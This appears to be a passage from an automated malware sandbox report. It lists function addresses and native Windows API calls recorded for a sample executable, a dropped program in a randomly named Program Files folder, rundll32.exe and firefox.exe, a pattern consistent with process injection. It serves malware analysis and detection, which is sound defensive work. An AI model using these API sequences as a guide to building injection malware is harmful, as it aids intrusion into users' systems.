Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0B10	29_2_1E8C0B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97FB2E	29_2_1E97FB2E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8D6882	29_2_1E8D6882
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9398B2	29_2_1E9398B2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C28C0	29_2_1E8C28C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9718DA	29_2_1E9718DA
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9778F3	29_2_1E9778F3
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C3800	29_2_1E8C3800
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8EE810	29_2_1E8EE810
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E960835	29_2_1E960835
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8A6868	29_2_1E8A6868
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E935870	29_2_1E935870
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F872	29_2_1E97F872
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C9870	29_2_1E8C9870
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DB870	29_2_1E8DB870
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8BE9A0	29_2_1E8BE9A0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97E9A6	29_2_1E97E9A6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9059C0	29_2_1E9059C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0680	29_2_1E8C0680
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97A6C0	29_2_1E97A6C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F6F6	29_2_1E97F6F6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8BC6E0	29_2_1E8BC6E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9336EC	29_2_1E9336EC
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DC600	29_2_1E8DC600
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E95D62C	29_2_1E95D62C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E96D646	29_2_1E96D646
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8E4670	29_2_1E8E4670
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E976757	29_2_1E976757
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C2760	29_2_1E8C2760
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CA760	29_2_1E8CA760
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E92D480	29_2_1E92D480
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0445	29_2_1E8C0445
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9775C6	29_2_1E9775C6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F5C9	29_2_1E97F5C9
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E98A526	29_2_1E98A526
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8AD2EC	29_2_1E8AD2EC
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97124C	29_2_1E97124C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8B1380	29_2_1E8B1380
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CE310	29_2_1E8CE310
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F330	29_2_1E97F330
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F508C	29_2_1E8F508C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8B00A0	29_2_1E8B00A0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CB0D0	29_2_1E8CB0D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9770F1	29_2_1E9770F1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E96E076	29_2_1E96E076
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C51C0	29_2_1E8C51C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DB1E0	29_2_1E8DB1E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E98010E	29_2_1E98010E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8AF113	29_2_1E8AF113
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E95D130	29_2_1E95D130
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E90717A	29_2_1E90717A
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00562386	29_2_00562386
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056C88B	29_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00572AD2	29_2_00572AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00563CE1	29_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00561069	29_2_00561069
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00571161	29_2_00571161
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056523E	29_2_0056523E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0057322B	29_2_0057322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00571490	29_2_00571490
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_005604A3	29_2_005604A3
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056A574	29_2_0056A574
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_005706A2	29_2_005706A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00570754	29_2_00570754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00565814	29_2_00565814
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056CE0C	29_2_0056CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056FFED	29_2_0056FFED
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E980EAD	30_2_1E980EAD
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D1EB2	30_2_1E8D1EB2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E989ED2	30_2_1E989ED2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8C2EE8	30_2_1E8C2EE8
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E912E48	30_2_1E912E48
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8F0E50	30_2_1E8F0E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E970E6D	30_2_1E970E6D
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98EFBF	30_2_1E98EFBF
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E981FC6	30_2_1E981FC6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D6FE0	30_2_1E8D6FE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8DCF00	30_2_1E8DCF00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E94FF40	30_2_1E94FF40
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98FF63	30_2_1E98FF63
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E969C98	30_2_1E969C98
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8E8CDF	30_2_1E8E8CDF
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8EFCE0	30_2_1E8EFCE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E99ACEB	30_2_1E99ACEB
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E957CE8	30_2_1E957CE8
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8C0C12	30_2_1E8C0C12
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8DAC20	30_2_1E8DAC20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E94EC20	30_2_1E94EC20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E97EC4C	30_2_1E97EC4C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D3C60	30_2_1E8D3C60
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E986C69	30_2_1E986C69
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98EC60	30_2_1E98EC60
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8E2DB0	30_2_1E8E2DB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D9DD0	30_2_1E8D9DD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E96FDF4	30_2_1E96FDF4
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8CAD00	30_2_1E8CAD00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98FD27	30_2_1E98FD27
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E987D4C	30_2_1E987D4C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D0D69	30_2_1E8D0D69
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98FA89	30_2_1E98FA89
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8EFAA0	30_2_1E8EFAA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98CA13	30_2_1E98CA13
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98EA5B	30_2_1E98EA5B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E944BC0	30_2_1E944BC0

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E8BB910 appears 268 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E94EF10 appears 105 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E917BE4 appears 96 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E93E692 appears 86 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E905050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E8F5050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA6E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA47BE4 appears 96 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E8BB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E93E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA7EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E94EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E8AB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E917BE4 appears 96 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA35050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E905050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E92E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E93EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E9EB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E907BE4 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043EEF10 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043B7BE4 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043A5050 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043DE692 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0435B910 appears 268 times

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023223E2 NtProtectVirtualMemory,	2_2_023223E2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231C88B NtAllocateVirtualMemory,LoadLibraryA,	2_2_0231C88B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023206A2 NtWriteVirtualMemory,LoadLibraryA,	2_2_023206A2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0232322B NtWriteVirtualMemory,	2_2_0232322B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231CE0C NtWriteVirtualMemory,LoadLibraryA,	2_2_0231CE0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02320754 NtWriteVirtualMemory,LoadLibraryA,	2_2_02320754
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_1E902EB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902ED0 NtResumeThread,LdrInitializeThunk,	10_2_1E902ED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902E50 NtCreateSection,LdrInitializeThunk,	10_2_1E902E50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902F00 NtCreateFile,LdrInitializeThunk,	10_2_1E902F00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902CF0 NtDelayExecution,LdrInitializeThunk,	10_2_1E902CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C30 NtMapViewOfSection,LdrInitializeThunk,	10_2_1E902C30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C50 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_1E902C50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902DA0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_1E902DA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_1E902DC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk,	10_2_1E902D10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_1E902B90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902BC0 NtQueryInformationToken,LdrInitializeThunk,	10_2_1E902BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_1E902B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9029F0 NtReadFile,LdrInitializeThunk,	10_2_1E9029F0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9034E0 NtCreateMutant,LdrInitializeThunk,	10_2_1E9034E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902E80 NtCreateProcessEx,	10_2_1E902E80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902EC0 NtQuerySection,	10_2_1E902EC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902E00 NtQueueApcThread,	10_2_1E902E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902FB0 NtSetValueKey,	10_2_1E902FB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902F30 NtOpenDirectoryObject,	10_2_1E902F30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E903C90 NtOpenThread,	10_2_1E903C90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902CD0 NtEnumerateKey,	10_2_1E902CD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C10 NtOpenProcess,	10_2_1E902C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E903C30 NtOpenProcessToken,	10_2_1E903C30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C20 NtSetInformationFile,	10_2_1E902C20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902D50 NtWriteVirtualMemory,	10_2_1E902D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902A80 NtClose,	10_2_1E902A80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902AA0 NtQueryInformationFile,	10_2_1E902AA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902AC0 NtEnumerateValueKey,	10_2_1E902AC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902A10 NtWriteFile,	10_2_1E902A10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B80 NtCreateKey,	10_2_1E902B80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902BE0 NtQueryVirtualMemory,	10_2_1E902BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B00 NtQueryValueKey,	10_2_1E902B00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B20 NtQueryInformationProcess,	10_2_1E902B20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9038D0 NtGetContextThread,	10_2_1E9038D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9029D0 NtWaitForSingleObject,	10_2_1E9029D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E904570 NtSuspendThread,	10_2_1E904570
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E904260 NtSetContextThread,	10_2_1E904260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A34E0 NtCreateMutant,LdrInitializeThunk,	15_2_043A34E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C30 NtMapViewOfSection,LdrInitializeThunk,	15_2_043A2C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2CF0 NtDelayExecution,LdrInitializeThunk,	15_2_043A2CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2D10 NtQuerySystemInformation,LdrInitializeThunk,	15_2_043A2D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_043A2DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2E50 NtCreateSection,LdrInitializeThunk,	15_2_043A2E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2F00 NtCreateFile,LdrInitializeThunk,	15_2_043A2F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2FB0 NtSetValueKey,LdrInitializeThunk,	15_2_043A2FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A29F0 NtReadFile,LdrInitializeThunk,	15_2_043A29F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2A80 NtClose,LdrInitializeThunk,	15_2_043A2A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2AC0 NtEnumerateValueKey,LdrInitializeThunk,	15_2_043A2AC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_043A2B10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B00 NtQueryValueKey,LdrInitializeThunk,	15_2_043A2B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B90 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_043A2B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B80 NtCreateKey,LdrInitializeThunk,	15_2_043A2B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2BC0 NtQueryInformationToken,LdrInitializeThunk,	15_2_043A2BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A4570 NtSuspendThread,	15_2_043A4570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A4260 NtSetContextThread,	15_2_043A4260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A3C30 NtOpenProcessToken,	15_2_043A3C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C20 NtSetInformationFile,	15_2_043A2C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C10 NtOpenProcess,	15_2_043A2C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C50 NtUnmapViewOfSection,	15_2_043A2C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A3C90 NtOpenThread,	15_2_043A3C90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2CD0 NtEnumerateKey,	15_2_043A2CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2D50 NtWriteVirtualMemory,	15_2_043A2D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2DA0 NtReadVirtualMemory,	15_2_043A2DA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2E00 NtQueueApcThread,	15_2_043A2E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2EB0 NtProtectVirtualMemory,	15_2_043A2EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2E80 NtCreateProcessEx,	15_2_043A2E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2ED0 NtResumeThread,	15_2_043A2ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2EC0 NtQuerySection,	15_2_043A2EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2F30 NtOpenDirectoryObject,	15_2_043A2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A38D0 NtGetContextThread,	15_2_043A38D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A29D0 NtWaitForSingleObject,	15_2_043A29D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2A10 NtWriteFile,	15_2_043A2A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2AA0 NtQueryInformationFile,	15_2_043A2AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B20 NtQueryInformationProcess,	15_2_043A2B20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2BE0 NtQueryVirtualMemory,	15_2_043A2BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_004185E0 NtCreateFile,	15_2_004185E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00418690 NtReadFile,	15_2_00418690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00418710 NtClose,	15_2_00418710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_004187C0 NtAllocateVirtualMemory,	15_2_004187C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0041868D NtReadFile,	15_2_0041868D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0041870A NtClose,	15_2_0041870A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_004187C2 NtAllocateVirtualMemory,	15_2_004187C2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A2AD2 NtSetContextThread,	22_2_022A2AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A23E2 NtProtectVirtualMemory,	22_2_022A23E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA,	22_2_0229C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA,	22_2_022A06A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A322B NtWriteVirtualMemory,	22_2_022A322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA,	22_2_0229CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A0754 NtWriteVirtualMemory,LoadLibraryA,	22_2_022A0754
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 25_2_000001BF40004D02 NtCreateFile,	25_2_000001BF40004D02
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A2AD2 NtSetInformationThread,	26_2_022A2AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A23E2 NtProtectVirtualMemory,	26_2_022A23E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA,	26_2_0229C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA,	26_2_022A06A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A322B NtWriteVirtualMemory,	26_2_022A322B
